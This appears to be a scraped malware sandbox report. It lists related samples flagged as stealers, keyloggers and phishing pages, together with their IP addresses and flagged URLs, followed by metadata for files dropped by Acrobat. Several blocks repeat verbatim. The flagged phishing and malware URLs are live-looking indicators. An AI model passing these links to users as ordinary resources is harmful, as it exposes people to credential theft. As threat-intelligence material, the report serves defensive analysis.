V6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                CLOUDFLARENETUShttps://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=scGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                z74fBF2ObiS1g87mbS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                http://shoutout.wix.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Scan_1626227.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.18.95.41
                                                                                                                                                https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.79.135
                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                • 172.64.41.3
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                https://web-login.malwarebouncer.com/XTUJCUERyUUI1U0FNNzZXQUJ5MHZQSmdBM1hZSE5mcVI4VzQ0aS9zTXBrOTY4enJacHgzQ2x0Mlp5cnkzRUlDSlBNV1BkTnNEaWdmSXJJTW1LZlFSWmhoNy83YnI5Y3pVVjR4ZmVXd3pKVkczLzBqTllIelpxaHo1MEJiZUc1cFJiZTM2akJiQlN2U1pBSDRUUld2ZVhJRmpPemZadmJNTFNiNi9rYmcrQ0tIUi9Kc0VzMmc0bWJ2bTV6U3N1bFQvbUREN2ZuYUZLY29ITjZDdEtnTEQtLSswcXR3ODBibTF1cUxEQ3ktLXprOHNld0xDdERQRHRVQXBmRG5pakE9PQ==?cid=2255119917Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                CLOUDFLARENETUShttps://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=scGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                z74fBF2ObiS1g87mbS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                http://shoutout.wix.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                Scan_1626227.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 104.18.95.41
                                                                                                                                                https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.79.135
                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                • 172.64.41.3
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.96.3
                                                                                                                                                https://web-login.malwarebouncer.com/XTUJCUERyUUI1U0FNNzZXQUJ5MHZQSmdBM1hZSE5mcVI4VzQ0aS9zTXBrOTY4enJacHgzQ2x0Mlp5cnkzRUlDSlBNV1BkTnNEaWdmSXJJTW1LZlFSWmhoNy83YnI5Y3pVVjR4ZmVXd3pKVkczLzBqTllIelpxaHo1MEJiZUc1cFJiZTM2akJiQlN2U1pBSDRUUld2ZVhJRmpPemZadmJNTFNiNi9rYmcrQ0tIUi9Kc0VzMmc0bWJ2bTV6U3N1bFQvbUREN2ZuYUZLY29ITjZDdEtnTEQtLSswcXR3ODBibTF1cUxEQ3ktLXprOHNld0xDdERQRHRVQXBmRG5pakE9PQ==?cid=2255119917Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                • 151.101.1.91
                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                • 151.101.129.91
                                                                                                                                                http://shoutout.wix.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 199.232.188.157
                                                                                                                                                https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.2.137
                                                                                                                                                http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.64.84
                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                • 151.101.1.91
                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                • 151.101.193.91
                                                                                                                                                https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                • 151.101.1.229
                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                • 151.101.1.91
                                                                                                                                                Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 151.101.66.137
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4http://demettei.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGGet hashmaliciousUnknownBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                (No subject) (93).emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                http://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                https://web-login.malwarebouncer.com/XTUJCUERyUUI1U0FNNzZXQUJ5MHZQSmdBM1hZSE5mcVI4VzQ0aS9zTXBrOTY4enJacHgzQ2x0Mlp5cnkzRUlDSlBNV1BkTnNEaWdmSXJJTW1LZlFSWmhoNy83YnI5Y3pVVjR4ZmVXd3pKVkczLzBqTllIelpxaHo1MEJiZUc1cFJiZTM2akJiQlN2U1pBSDRUUld2ZVhJRmpPemZadmJNTFNiNi9rYmcrQ0tIUi9Kc0VzMmc0bWJ2bTV6U3N1bFQvbUREN2ZuYUZLY29ITjZDdEtnTEQtLSswcXR3ODBibTF1cUxEQ3ktLXprOHNld0xDdERQRHRVQXBmRG5pakE9PQ==?cid=2255119917Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4&xsdata=MDV8MDJ8c2NvdHRkaWF6QGRlbWVpbmVlc3RhdGVzLmNvbXw2YjUyZTY2NWViYzI0M2MxZGE1NjA4ZGNmNzI0NDEwY3xkMTRiYThjYzk2NDI0NzNhYTE0ZWY3NzIxODgzMzJmZXwwfDB8NjM4NjU2OTgyMzMwNDY2MDIzfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=ZnFidXdudm9CbXlMY3MxYTAxVjk3N2plVFdSTHZ5MVlZOGdkRkRZNEUxYz0%3dGet hashmaliciousUnknownBrowse
                                                                                                                                                • 172.202.163.200
                                                                                                                                                • 184.28.90.27
                                                                                                                                                No context
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):5.209047174019277
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWyVq2PRN2nKuAl9OmbnIFUt8hBWKFUJgZmw+hBWKFUJIkwORN2nKuAl9OmbjLJ:8/VvaHAahFUt8jVKg/+jVKI5JHAaSJ
                                                                                                                                                MD5:0C076E72243FEDF5F774E2F5CD0AA8A6
                                                                                                                                                SHA1:C973B9F572311239310A74812F21685714BA5CD3
                                                                                                                                                SHA-256:022463C726B30C54DB38C22C657374A71182292748D1049B781027AB8E0FFE74
                                                                                                                                                SHA-512:D932861EEC688385A2CDBF6122B97804ACECC4471EA156E21EEC73357AF57B8F7D4CDE98C2B43A26AB40B1B792D4560019DE00C4D7ECAB4621E198232B4B95DC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:2024/10/28-12:47:26.286 1bc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/28-12:47:26.289 1bc4 Recovering log #3.2024/10/28-12:47:26.289 1bc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):5.209047174019277
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWyVq2PRN2nKuAl9OmbnIFUt8hBWKFUJgZmw+hBWKFUJIkwORN2nKuAl9OmbjLJ:8/VvaHAahFUt8jVKg/+jVKI5JHAaSJ
                                                                                                                                                MD5:0C076E72243FEDF5F774E2F5CD0AA8A6
                                                                                                                                                SHA1:C973B9F572311239310A74812F21685714BA5CD3
                                                                                                                                                SHA-256:022463C726B30C54DB38C22C657374A71182292748D1049B781027AB8E0FFE74
                                                                                                                                                SHA-512:D932861EEC688385A2CDBF6122B97804ACECC4471EA156E21EEC73357AF57B8F7D4CDE98C2B43A26AB40B1B792D4560019DE00C4D7ECAB4621E198232B4B95DC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:2024/10/28-12:47:26.286 1bc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/28-12:47:26.289 1bc4 Recovering log #3.2024/10/28-12:47:26.289 1bc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):331
                                                                                                                                                Entropy (8bit):5.186490738191271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:yBWIt+q2PRN2nKuAl9Ombzo2jMGIFUt8hBWyZmw+hBWttVkwORN2nKuAl9Ombzos:8cvaHAa8uFUt8j3/+jG5JHAa8RJ
                                                                                                                                                MD5:0340817B7A097209254B4F03F5CD9B13
                                                                                                                                                SHA1:82DD9D94C40C962D1C3BB6D2457D1C73FA46A44B
                                                                                                                                                SHA-256:B990CF4DD3B99D3AFBFF6BB95E47A019D76B98E754F2BE9F1C8AB52328AB3636
                                                                                                                                                SHA-512:1E872608881094685E5F77E779AA1333D73DBA41562A1209A1CDAC11C9CC799D9F5CE1E525530864D808FEC358C1E5E69E3811B00C89D7B01626E9387B3F566B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
